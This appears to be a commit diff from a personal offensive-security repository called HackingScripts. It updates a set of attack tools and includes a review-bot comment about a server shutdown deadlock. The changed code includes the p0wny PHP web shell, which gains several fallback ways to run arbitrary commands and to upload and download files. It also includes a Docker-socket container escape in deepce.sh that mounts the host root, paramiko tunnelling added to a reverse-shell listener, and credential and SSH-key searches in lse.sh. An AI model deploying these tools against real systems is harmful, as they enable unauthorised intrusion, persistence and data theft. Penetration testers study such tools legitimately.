Update Dependencies + paramiko port forwarding + some bug fixes
parent
9e6432d976
commit
b1380967a4
@ -2,6 +2,12 @@
|
|||||||
|
|
||||||
This repository contains self-made and common scripts for information gathering, enumeration and more.
|
This repository contains self-made and common scripts for information gathering, enumeration and more.
|
||||||
|
|
||||||
|
### Installation
|
||||||
|
```bash
|
||||||
|
git clone git@romanh.de:Roman/HackingScripts
|
||||||
|
sudo ln -s HackingScripts $(python -c "import sys;print(sys.path[-1])")/hackingscripts
|
||||||
|
```
|
||||||
|
|
||||||
### Enumeration: Initial Scans
|
### Enumeration: Initial Scans
|
||||||
- first_scan.sh: Performs initial nmap scan
|
- first_scan.sh: Performs initial nmap scan
|
||||||
- gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt
|
- gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt
|
||||||
|
BIN
chisel
BIN
chisel
Binary file not shown.
BIN
chisel64
BIN
chisel64
Binary file not shown.
21
deepce.sh
21
deepce.sh
@ -129,7 +129,7 @@ TIP_CVE_2019_5736="Docker versions before 18.09.2 are vulnerable to a container
|
|||||||
TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
|
TIP_SYS_MODULE="Giving the container the SYS_MODULE privilege allows for kernel modules to be mounted. Using this, a malicious module can be used to execute code as root on the host."
|
||||||
|
|
||||||
DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
|
DANGEROUS_GROUPS="docker\|lxd\|root\|sudo\|wheel"
|
||||||
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override"
|
DANGEROUS_CAPABILITIES="cap_sys_admin\|cap_sys_ptrace\|cap_sys_module\|dac_read_search\|dac_override\|cap_sys_rawio\|cap_mknod"
|
||||||
|
|
||||||
CONTAINER_CMDS="docker lxc rkt kubectl podman"
|
CONTAINER_CMDS="docker lxc rkt kubectl podman"
|
||||||
USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap"
|
USEFUL_CMDS="curl wget gcc nc netcat ncat jq nslookup host hostname dig python python2 python3 nmap"
|
||||||
@ -561,7 +561,13 @@ containerCapabilities() {
|
|||||||
printNo
|
printNo
|
||||||
fi
|
fi
|
||||||
else
|
else
|
||||||
printError "Unknown (capsh not installed)"
|
caps=$(grep Cap /proc/self/status)
|
||||||
|
capEff=$(grep CapEff /proc/self/status | cut -d ':' -f 2 | tr -d '\t')
|
||||||
|
printError "capsh not installed, listing raw capabilities"
|
||||||
|
printInstallAdvice "libcap2-bin"
|
||||||
|
printStatus "Current capabilities are:"
|
||||||
|
printStatus "$caps"
|
||||||
|
printStatus "> This can be decoded with: \"capsh --decode=${capEff}\""
|
||||||
fi
|
fi
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -1046,9 +1052,18 @@ exploitDockerSock() {
|
|||||||
|
|
||||||
nl
|
nl
|
||||||
|
|
||||||
|
# Try to find an available docker image
|
||||||
|
json_data=$(curl -s --unix-socket /var/run/docker.sock http://localhost/images/json)
|
||||||
|
docker_img=$(echo "$json_data" | grep -o '"RepoTags":\["[^"]*' | grep -o '[^"]*$' | tail -1)
|
||||||
|
|
||||||
|
if [ -z "$docker_img" ]; then
|
||||||
|
printInfo 'No avaliable docker image found, using alpine'
|
||||||
|
docker_img="alpine"
|
||||||
|
fi
|
||||||
|
|
||||||
# Create docker container using the docker sock
|
# Create docker container using the docker sock
|
||||||
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
|
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$cmd\\\"\"]"
|
||||||
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"alpine\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
|
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"$docker_img\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
|
||||||
|
|
||||||
if ! [ $? ]; then
|
if ! [ $? ]; then
|
||||||
printError 'Something went wrong'
|
printError 'Something went wrong'
|
||||||
|
@ -137,7 +137,6 @@ class HttpFileServer(HTTPServer):
|
|||||||
self.prefix_routes = { }
|
self.prefix_routes = { }
|
||||||
self.is_running = True
|
self.is_running = True
|
||||||
self.listen_thread = None
|
self.listen_thread = None
|
||||||
self.has_exited = False
|
|
||||||
|
|
||||||
def cleanPath(self, path):
|
def cleanPath(self, path):
|
||||||
|
|
||||||
@ -231,9 +230,6 @@ class HttpFileServer(HTTPServer):
|
|||||||
self.listen_thread.start()
|
self.listen_thread.start()
|
||||||
return self.listen_thread
|
return self.listen_thread
|
||||||
|
|
||||||
def start(self):
|
|
||||||
return self.serve_forever()
|
|
||||||
|
|
||||||
def get_base_url():
|
def get_base_url():
|
||||||
addr, port = self.server_address
|
addr, port = self.server_address
|
||||||
if port != 80:
|
if port != 80:
|
||||||
@ -243,28 +239,11 @@ class HttpFileServer(HTTPServer):
|
|||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
self.is_running = False
|
self.is_running = False
|
||||||
time.sleep(1)
|
time.sleep(1)
|
||||||
|
self.shutdown()
|
||||||
try:
|
|
||||||
# dummy request
|
|
||||||
for i in range(3):
|
|
||||||
requests.get(f"{self.get_base_url()}/dummy")
|
|
||||||
if self.has_exited:
|
|
||||||
break
|
|
||||||
time.sleep(1)
|
|
||||||
except:
|
|
||||||
pass
|
|
||||||
|
|
||||||
if self.listen_thread != threading.currentThread():
|
if self.listen_thread != threading.currentThread():
|
||||||
self.listen_thread.join()
|
self.listen_thread.join()
|
||||||
|
|
||||||
def serve_forever(self):
|
|
||||||
self.has_exited = False
|
|
||||||
while self.is_running:
|
|
||||||
self.handle_request()
|
|
||||||
self.has_exited = True
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
|
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]:
|
||||||
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
|
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
|
||||||
|
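Review bot: `stop()` now calls `self.shutdown()` unconditionally, but `socketserver.BaseServer.shutdown()` blocks until the `serve_forever()` loop has exited, so a `stop()` issued from the listening thread itself (for instance from inside a request handler) deadlocks; only the later `join()` is protected by the `threading.currentThread()` comparison. Put the shutdown under the same guard, `if self.listen_thread is not threading.current_thread():` / `    self.shutdown()` / `    self.listen_thread.join()`, and switch to `current_thread()` since `currentThread()` is a deprecated alias; in the same-thread case the server then has to be shut down from another thread rather than hanging. With the custom `serve_forever` override gone, `self.is_running = False` no longer stops anything and the unconditional `time.sleep(1)` before the shutdown looks like a leftover of the old polling loop — if no other code reads the flag, both can be dropped. The enclosing `HttpFileServer` class starts before this hunk.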
2760
linpeas.sh
2760
linpeas.sh
File diff suppressed because one or more lines are too long
@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
#
|
#
|
||||||
# Copyright (c) 2016-2022, @_mzet_
|
# Copyright (c) 2016-2023, https://github.com/mzet-
|
||||||
#
|
#
|
||||||
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
|
# linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY.
|
||||||
# This is free software, and you are welcome to redistribute it
|
# This is free software, and you are welcome to redistribute it
|
||||||
|
9
lse.sh
9
lse.sh
@ -5,7 +5,7 @@
|
|||||||
# Author: Diego Blanco <diego.blanco@treitos.com>
|
# Author: Diego Blanco <diego.blanco@treitos.com>
|
||||||
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration
|
||||||
#
|
#
|
||||||
lse_version="4.10nw"
|
lse_version="4.13nw"
|
||||||
|
|
||||||
##( Colors
|
##( Colors
|
||||||
#
|
#
|
||||||
@ -611,6 +611,7 @@ lse_get_distro_codename() { #(
|
|||||||
elif [ -f /etc/os-release ]; then
|
elif [ -f /etc/os-release ]; then
|
||||||
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
|
distro=`grep -E '^ID=' /etc/os-release | cut -f2 -d=`
|
||||||
echo "$distro" | grep -qi opensuse && distro=opsuse
|
echo "$distro" | grep -qi opensuse && distro=opsuse
|
||||||
|
echo "$distro" | grep -qi rhel && distro=redhat
|
||||||
elif [ -f /etc/redhat-release ]; then
|
elif [ -f /etc/redhat-release ]; then
|
||||||
grep -qi "centos" /etc/redhat-release && distro=centos
|
grep -qi "centos" /etc/redhat-release && distro=centos
|
||||||
grep -qi "fedora" /etc/redhat-release && distro=fedora
|
grep -qi "fedora" /etc/redhat-release && distro=fedora
|
||||||
@ -635,7 +636,7 @@ lse_get_pkg_version() { #(
|
|||||||
pkg_name="$1"
|
pkg_name="$1"
|
||||||
case "$lse_distro_codename" in
|
case "$lse_distro_codename" in
|
||||||
debian|ubuntu)
|
debian|ubuntu)
|
||||||
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^ii' | tr -s ' ' | cut -d' ' -f3`
|
pkg_version=`dpkg -l "$pkg_name" 2>/dev/null | grep -E '^[ih]i' | tr -s ' ' | cut -d' ' -f3`
|
||||||
;;
|
;;
|
||||||
centos|redhat|fedora|opsuse|rocky|amzn)
|
centos|redhat|fedora|opsuse|rocky|amzn)
|
||||||
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
|
pkg_version=`rpm -q "$pkg_name" 2>/dev/null`
|
||||||
@ -845,7 +846,7 @@ lse_run_tests_filesystem() {
|
|||||||
#looking for credentials in /etc/fstab and /etc/mtab
|
#looking for credentials in /etc/fstab and /etc/mtab
|
||||||
lse_test "fst120" "0" \
|
lse_test "fst120" "0" \
|
||||||
"Are there any credentials in fstab/mtab?" \
|
"Are there any credentials in fstab/mtab?" \
|
||||||
'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab'
|
'grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials|cred)[=:]" /etc/fstab /etc/mtab'
|
||||||
|
|
||||||
#check if current user has mail
|
#check if current user has mail
|
||||||
lse_test "fst130" "1" \
|
lse_test "fst130" "1" \
|
||||||
@ -910,7 +911,7 @@ lse_run_tests_filesystem() {
|
|||||||
#check for SSH files anywhere
|
#check for SSH files anywhere
|
||||||
lse_test "fst510" "2" \
|
lse_test "fst510" "2" \
|
||||||
"SSH files anywhere" \
|
"SSH files anywhere" \
|
||||||
'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
|
'find / $lse_find_opts \( -name "*id_dsa*" -o -name "*id_rsa*" -o -name "*id_ecdsa*" -o -name "*id_ed25519*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} \;'
|
||||||
|
|
||||||
#dump hosts.equiv file
|
#dump hosts.equiv file
|
||||||
lse_test "fst520" "2" \
|
lse_test "fst520" "2" \
|
||||||
|
156
p0wny-shell.php
156
p0wny-shell.php
@ -1,5 +1,10 @@
|
|||||||
<?php
|
<?php
|
||||||
|
|
||||||
|
$SHELL_CONFIG = array(
|
||||||
|
'username' => 'p0wny',
|
||||||
|
'hostname' => 'shell',
|
||||||
|
);
|
||||||
|
|
||||||
function expandPath($path) {
|
function expandPath($path) {
|
||||||
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
|
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
|
||||||
exec("echo $match[1]", $stdout);
|
exec("echo $match[1]", $stdout);
|
||||||
@ -8,8 +13,52 @@ function expandPath($path) {
|
|||||||
return $path;
|
return $path;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
function allFunctionExist($list = array()) {
|
||||||
|
foreach ($list as $entry) {
|
||||||
|
if (!function_exists($entry)) {
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
function executeCommand($cmd) {
|
||||||
|
$output = '';
|
||||||
|
if (function_exists('exec')) {
|
||||||
|
exec($cmd, $output);
|
||||||
|
$output = implode("\n", $output);
|
||||||
|
} else if (function_exists('shell_exec')) {
|
||||||
|
$output = shell_exec($cmd);
|
||||||
|
} else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
|
||||||
|
ob_start();
|
||||||
|
system($cmd);
|
||||||
|
$output = ob_get_contents();
|
||||||
|
ob_end_clean();
|
||||||
|
} else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
|
||||||
|
ob_start();
|
||||||
|
passthru($cmd);
|
||||||
|
$output = ob_get_contents();
|
||||||
|
ob_end_clean();
|
||||||
|
} else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) {
|
||||||
|
$handle = popen($cmd, 'r');
|
||||||
|
while (!feof($handle)) {
|
||||||
|
$output .= fread($handle, 4096);
|
||||||
|
}
|
||||||
|
pclose($handle);
|
||||||
|
} else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) {
|
||||||
|
$handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes);
|
||||||
|
$output = stream_get_contents($pipes[1]);
|
||||||
|
proc_close($handle);
|
||||||
|
}
|
||||||
|
return $output;
|
||||||
|
}
|
||||||
|
|
||||||
|
function isRunningWindows() {
|
||||||
|
return stripos(PHP_OS, "WIN") === 0;
|
||||||
|
}
|
||||||
|
|
||||||
function featureShell($cmd, $cwd) {
|
function featureShell($cmd, $cwd) {
|
||||||
$stdout = array();
|
$stdout = "";
|
||||||
|
|
||||||
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
|
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
|
||||||
chdir(expandPath("~"));
|
chdir(expandPath("~"));
|
||||||
@ -23,17 +72,17 @@ function featureShell($cmd, $cwd) {
|
|||||||
return featureDownload($match[1]);
|
return featureDownload($match[1]);
|
||||||
} else {
|
} else {
|
||||||
chdir($cwd);
|
chdir($cwd);
|
||||||
exec($cmd, $stdout);
|
$stdout = executeCommand($cmd);
|
||||||
}
|
}
|
||||||
|
|
||||||
return array(
|
return array(
|
||||||
"stdout" => $stdout,
|
"stdout" => base64_encode($stdout),
|
||||||
"cwd" => getcwd()
|
"cwd" => base64_encode(getcwd())
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
function featurePwd() {
|
function featurePwd() {
|
||||||
return array("cwd" => getcwd());
|
return array("cwd" => base64_encode(getcwd()));
|
||||||
}
|
}
|
||||||
|
|
||||||
function featureHint($fileName, $cwd, $type) {
|
function featureHint($fileName, $cwd, $type) {
|
||||||
@ -45,6 +94,9 @@ function featureHint($fileName, $cwd, $type) {
|
|||||||
}
|
}
|
||||||
$cmd = "/bin/bash -c \"$cmd\"";
|
$cmd = "/bin/bash -c \"$cmd\"";
|
||||||
$files = explode("\n", shell_exec($cmd));
|
$files = explode("\n", shell_exec($cmd));
|
||||||
|
foreach ($files as &$filename) {
|
||||||
|
$filename = base64_encode($filename);
|
||||||
|
}
|
||||||
return array(
|
return array(
|
||||||
'files' => $files,
|
'files' => $files,
|
||||||
);
|
);
|
||||||
@ -54,12 +106,12 @@ function featureDownload($filePath) {
|
|||||||
$file = @file_get_contents($filePath);
|
$file = @file_get_contents($filePath);
|
||||||
if ($file === FALSE) {
|
if ($file === FALSE) {
|
||||||
return array(
|
return array(
|
||||||
'stdout' => array('File not found / no read permission.'),
|
'stdout' => base64_encode('File not found / no read permission.'),
|
||||||
'cwd' => getcwd()
|
'cwd' => base64_encode(getcwd())
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
return array(
|
return array(
|
||||||
'name' => basename($filePath),
|
'name' => base64_encode(basename($filePath)),
|
||||||
'file' => base64_encode($file)
|
'file' => base64_encode($file)
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
@ -70,19 +122,40 @@ function featureUpload($path, $file, $cwd) {
|
|||||||
$f = @fopen($path, 'wb');
|
$f = @fopen($path, 'wb');
|
||||||
if ($f === FALSE) {
|
if ($f === FALSE) {
|
||||||
return array(
|
return array(
|
||||||
'stdout' => array('Invalid path / no write permission.'),
|
'stdout' => base64_encode('Invalid path / no write permission.'),
|
||||||
'cwd' => getcwd()
|
'cwd' => base64_encode(getcwd())
|
||||||
);
|
);
|
||||||
} else {
|
} else {
|
||||||
fwrite($f, base64_decode($file));
|
fwrite($f, base64_decode($file));
|
||||||
fclose($f);
|
fclose($f);
|
||||||
return array(
|
return array(
|
||||||
'stdout' => array('Done.'),
|
'stdout' => base64_encode('Done.'),
|
||||||
'cwd' => getcwd()
|
'cwd' => base64_encode(getcwd())
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
function initShellConfig() {
|
||||||
|
global $SHELL_CONFIG;
|
||||||
|
|
||||||
|
if (isRunningWindows()) {
|
||||||
|
$username = getenv('USERNAME');
|
||||||
|
if ($username !== false) {
|
||||||
|
$SHELL_CONFIG['username'] = $username;
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
$pwuid = posix_getpwuid(posix_geteuid());
|
||||||
|
if ($pwuid !== false) {
|
||||||
|
$SHELL_CONFIG['username'] = $pwuid['name'];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$hostname = gethostname();
|
||||||
|
if ($hostname !== false) {
|
||||||
|
$SHELL_CONFIG['hostname'] = $hostname;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
if (isset($_GET["feature"])) {
|
if (isset($_GET["feature"])) {
|
||||||
|
|
||||||
$response = NULL;
|
$response = NULL;
|
||||||
@ -108,6 +181,8 @@ if (isset($_GET["feature"])) {
|
|||||||
header("Content-Type: application/json");
|
header("Content-Type: application/json");
|
||||||
echo json_encode($response);
|
echo json_encode($response);
|
||||||
die();
|
die();
|
||||||
|
} else {
|
||||||
|
initShellConfig();
|
||||||
}
|
}
|
||||||
|
|
||||||
?><!DOCTYPE html>
|
?><!DOCTYPE html>
|
||||||
@ -125,6 +200,9 @@ if (isset($_GET["feature"])) {
|
|||||||
background: #333;
|
background: #333;
|
||||||
color: #eee;
|
color: #eee;
|
||||||
font-family: monospace;
|
font-family: monospace;
|
||||||
|
width: 100vw;
|
||||||
|
height: 100vh;
|
||||||
|
overflow: hidden;
|
||||||
}
|
}
|
||||||
|
|
||||||
*::-webkit-scrollbar-track {
|
*::-webkit-scrollbar-track {
|
||||||
@ -145,17 +223,21 @@ if (isset($_GET["feature"])) {
|
|||||||
|
|
||||||
#shell {
|
#shell {
|
||||||
background: #222;
|
background: #222;
|
||||||
max-width: 800px;
|
|
||||||
margin: 50px auto 0 auto;
|
|
||||||
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
|
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
|
||||||
font-size: 10pt;
|
font-size: 10pt;
|
||||||
display: flex;
|
display: flex;
|
||||||
flex-direction: column;
|
flex-direction: column;
|
||||||
align-items: stretch;
|
align-items: stretch;
|
||||||
|
max-width: calc(100vw - 2 * var(--shell-margin));
|
||||||
|
max-height: calc(100vh - 2 * var(--shell-margin));
|
||||||
|
resize: both;
|
||||||
|
overflow: hidden;
|
||||||
|
width: 100%;
|
||||||
|
height: 100%;
|
||||||
|
margin: var(--shell-margin) auto;
|
||||||
}
|
}
|
||||||
|
|
||||||
#shell-content {
|
#shell-content {
|
||||||
height: 500px;
|
|
||||||
overflow: auto;
|
overflow: auto;
|
||||||
padding: 5px;
|
padding: 5px;
|
||||||
white-space: pre-wrap;
|
white-space: pre-wrap;
|
||||||
@ -168,20 +250,27 @@ if (isset($_GET["feature"])) {
|
|||||||
text-align: center;
|
text-align: center;
|
||||||
}
|
}
|
||||||
|
|
||||||
@media (max-width: 991px) {
|
:root {
|
||||||
|
--shell-margin: 25px;
|
||||||
|
}
|
||||||
|
|
||||||
|
@media (min-width: 1200px) {
|
||||||
|
:root {
|
||||||
|
--shell-margin: 50px !important;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
@media (max-width: 991px),
|
||||||
|
(max-height: 600px) {
|
||||||
#shell-logo {
|
#shell-logo {
|
||||||
font-size: 6px;
|
font-size: 6px;
|
||||||
margin: -25px 0;
|
margin: -25px 0;
|
||||||
}
|
}
|
||||||
|
:root {
|
||||||
html, body, #shell {
|
--shell-margin: 0 !important;
|
||||||
height: 100%;
|
|
||||||
width: 100%;
|
|
||||||
max-width: none;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#shell {
|
#shell {
|
||||||
margin-top: 0;
|
resize: none;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -210,6 +299,7 @@ if (isset($_GET["feature"])) {
|
|||||||
display: flex;
|
display: flex;
|
||||||
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
|
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
|
||||||
border-top: rgba(255, 255, 255, .05) solid 1px;
|
border-top: rgba(255, 255, 255, .05) solid 1px;
|
||||||
|
padding: 10px 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
#shell-input > label {
|
#shell-input > label {
|
||||||
@ -230,6 +320,7 @@ if (isset($_GET["feature"])) {
|
|||||||
font-size: 10pt;
|
font-size: 10pt;
|
||||||
width: 100%;
|
width: 100%;
|
||||||
align-self: center;
|
align-self: center;
|
||||||
|
box-sizing: border-box;
|
||||||
}
|
}
|
||||||
|
|
||||||
#shell-input div {
|
#shell-input div {
|
||||||
@ -243,6 +334,7 @@ if (isset($_GET["feature"])) {
|
|||||||
</style>
|
</style>
|
||||||
|
|
||||||
<script>
|
<script>
|
||||||
|
var SHELL_CONFIG = <?php echo json_encode($SHELL_CONFIG); ?>;
|
||||||
var CWD = null;
|
var CWD = null;
|
||||||
var commandHistory = [];
|
var commandHistory = [];
|
||||||
var historyPosition = 0;
|
var historyPosition = 0;
|
||||||
@ -277,10 +369,10 @@ if (isset($_GET["feature"])) {
|
|||||||
} else {
|
} else {
|
||||||
makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
|
makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
|
||||||
if (response.hasOwnProperty('file')) {
|
if (response.hasOwnProperty('file')) {
|
||||||
featureDownload(response.name, response.file)
|
featureDownload(atob(response.name), response.file)
|
||||||
} else {
|
} else {
|
||||||
_insertStdout(response.stdout.join("\n"));
|
_insertStdout(atob(response.stdout));
|
||||||
updateCwd(response.cwd);
|
updateCwd(atob(response.cwd));
|
||||||
}
|
}
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
@ -291,7 +383,9 @@ if (isset($_GET["feature"])) {
|
|||||||
|
|
||||||
function _requestCallback(data) {
|
function _requestCallback(data) {
|
||||||
if (data.files.length <= 1) return; // no completion
|
if (data.files.length <= 1) return; // no completion
|
||||||
|
data.files = data.files.map(function(file){
|
||||||
|
return atob(file);
|
||||||
|
});
|
||||||
if (data.files.length === 2) {
|
if (data.files.length === 2) {
|
||||||
if (type === 'cmd') {
|
if (type === 'cmd') {
|
||||||
eShellCmdInput.value = data.files[0];
|
eShellCmdInput.value = data.files[0];
|
||||||
@ -341,8 +435,8 @@ if (isset($_GET["feature"])) {
|
|||||||
var promise = getBase64(element.files[0]);
|
var promise = getBase64(element.files[0]);
|
||||||
promise.then(function (file) {
|
promise.then(function (file) {
|
||||||
makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
|
makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
|
||||||
_insertStdout(response.stdout.join("\n"));
|
_insertStdout(atob(response.stdout));
|
||||||
updateCwd(response.cwd);
|
updateCwd(atob(response.cwd));
|
||||||
});
|
});
|
||||||
}, function () {
|
}, function () {
|
||||||
_insertStdout('An unknown client-side error occurred.');
|
_insertStdout('An unknown client-side error occurred.');
|
||||||
@ -368,7 +462,7 @@ if (isset($_GET["feature"])) {
|
|||||||
var splittedCwd = cwd.split("/");
|
var splittedCwd = cwd.split("/");
|
||||||
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
|
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
|
||||||
}
|
}
|
||||||
return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
|
return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
|
||||||
}
|
}
|
||||||
|
|
||||||
function updateCwd(cwd) {
|
function updateCwd(cwd) {
|
||||||
@ -378,7 +472,7 @@ if (isset($_GET["feature"])) {
|
|||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
makeRequest("?feature=pwd", {}, function(response) {
|
makeRequest("?feature=pwd", {}, function(response) {
|
||||||
CWD = response.cwd;
|
CWD = atob(response.cwd);
|
||||||
_updatePrompt();
|
_updatePrompt();
|
||||||
});
|
});
|
||||||
|
|
||||||
|
BIN
pspy
BIN
pspy
Binary file not shown.
BIN
pspy64
BIN
pspy64
Binary file not shown.
104
rev_shell.py
104
rev_shell.py
@ -11,6 +11,13 @@ import threading
|
|||||||
import paramiko
|
import paramiko
|
||||||
import readline
|
import readline
|
||||||
import base64
|
import base64
|
||||||
|
import select
|
||||||
|
|
||||||
|
|
||||||
|
try:
|
||||||
|
import SocketServer
|
||||||
|
except ImportError:
|
||||||
|
import socketserver as SocketServer
|
||||||
|
|
||||||
class ShellListener:
|
class ShellListener:
|
||||||
|
|
||||||
@ -162,6 +169,97 @@ class ShellListener:
|
|||||||
if permissions:
|
if permissions:
|
||||||
self.sendline(f"chmod {permissions} {path}")
|
self.sendline(f"chmod {permissions} {path}")
|
||||||
|
|
||||||
|
class ParamikoTunnelServer(SocketServer.ThreadingTCPServer):
|
||||||
|
daemon_threads = True
|
||||||
|
allow_reuse_address = True
|
||||||
|
|
||||||
|
|
||||||
|
class ParamikoTunnel:
|
||||||
|
def __init__(self, shell, ports):
|
||||||
|
self.shell = shell
|
||||||
|
self.ports = ports
|
||||||
|
self.verbose = False
|
||||||
|
self.is_running = True
|
||||||
|
self.on_message = []
|
||||||
|
self.listen_threads = []
|
||||||
|
self.servers = []
|
||||||
|
|
||||||
|
def start_background(self):
|
||||||
|
for port in self.ports:
|
||||||
|
thread = threading.Thread(target=self.start, args=(port, ))
|
||||||
|
thread.start()
|
||||||
|
self.listen_threads.append(thread)
|
||||||
|
return self.listen_threads
|
||||||
|
|
||||||
|
def start(self, port):
|
||||||
|
this = self
|
||||||
|
class SubHandler(ParamikoTunnelHandler):
|
||||||
|
peer = this.shell.get_transport().sock.getpeername()
|
||||||
|
chain_host = "127.0.0.1"
|
||||||
|
chain_port = port
|
||||||
|
ssh_transport = this.shell.get_transport()
|
||||||
|
def log(self, message):
|
||||||
|
if this.verbose:
|
||||||
|
print(message)
|
||||||
|
|
||||||
|
forward_server = ParamikoTunnelServer(("127.0.0.1", port), SubHandler)
|
||||||
|
self.servers.append(forward_server)
|
||||||
|
forward_server.serve_forever()
|
||||||
|
|
||||||
|
def close(self):
|
||||||
|
self.is_running = False
|
||||||
|
for server in self.servers:
|
||||||
|
server._BaseServer__shutdown_request = True
|
||||||
|
for thread in self.listen_threads:
|
||||||
|
thread.join()
|
||||||
|
|
||||||
|
class ParamikoTunnelHandler(SocketServer.BaseRequestHandler):
|
||||||
|
def handle(self):
|
||||||
|
try:
|
||||||
|
chan = self.ssh_transport.open_channel(
|
||||||
|
"direct-tcpip",
|
||||||
|
(self.chain_host, self.chain_port),
|
||||||
|
self.request.getpeername(),
|
||||||
|
)
|
||||||
|
except Exception as e:
|
||||||
|
self.log(
|
||||||
|
"Incoming request to %s:%d failed: %s"
|
||||||
|
% (self.chain_host, self.chain_port, repr(e))
|
||||||
|
)
|
||||||
|
return
|
||||||
|
if chan is None:
|
||||||
|
self.log(
|
||||||
|
"Incoming request to %s:%d was rejected by the SSH server."
|
||||||
|
% (self.chain_host, self.chain_port)
|
||||||
|
)
|
||||||
|
return
|
||||||
|
|
||||||
|
self.log(
|
||||||
|
"Connected! Tunnel open %r -> %r -> %r"
|
||||||
|
% (
|
||||||
|
self.request.getpeername(),
|
||||||
|
chan.getpeername(),
|
||||||
|
(self.chain_host, self.chain_port),
|
||||||
|
)
|
||||||
|
)
|
||||||
|
while True:
|
||||||
|
r, w, x = select.select([self.request, chan], [], [])
|
||||||
|
if self.request in r:
|
||||||
|
data = self.request.recv(1024)
|
||||||
|
if len(data) == 0:
|
||||||
|
break
|
||||||
|
chan.send(data)
|
||||||
|
if chan in r:
|
||||||
|
data = chan.recv(1024)
|
||||||
|
if len(data) == 0:
|
||||||
|
break
|
||||||
|
self.request.send(data)
|
||||||
|
|
||||||
|
peername = self.request.getpeername()
|
||||||
|
chan.close()
|
||||||
|
self.request.close()
|
||||||
|
self.log("Tunnel closed from %r" % (peername,))
|
||||||
|
|
||||||
def generate_payload(type, local_address, port, index=None):
|
def generate_payload(type, local_address, port, index=None):
|
||||||
|
|
||||||
commands = []
|
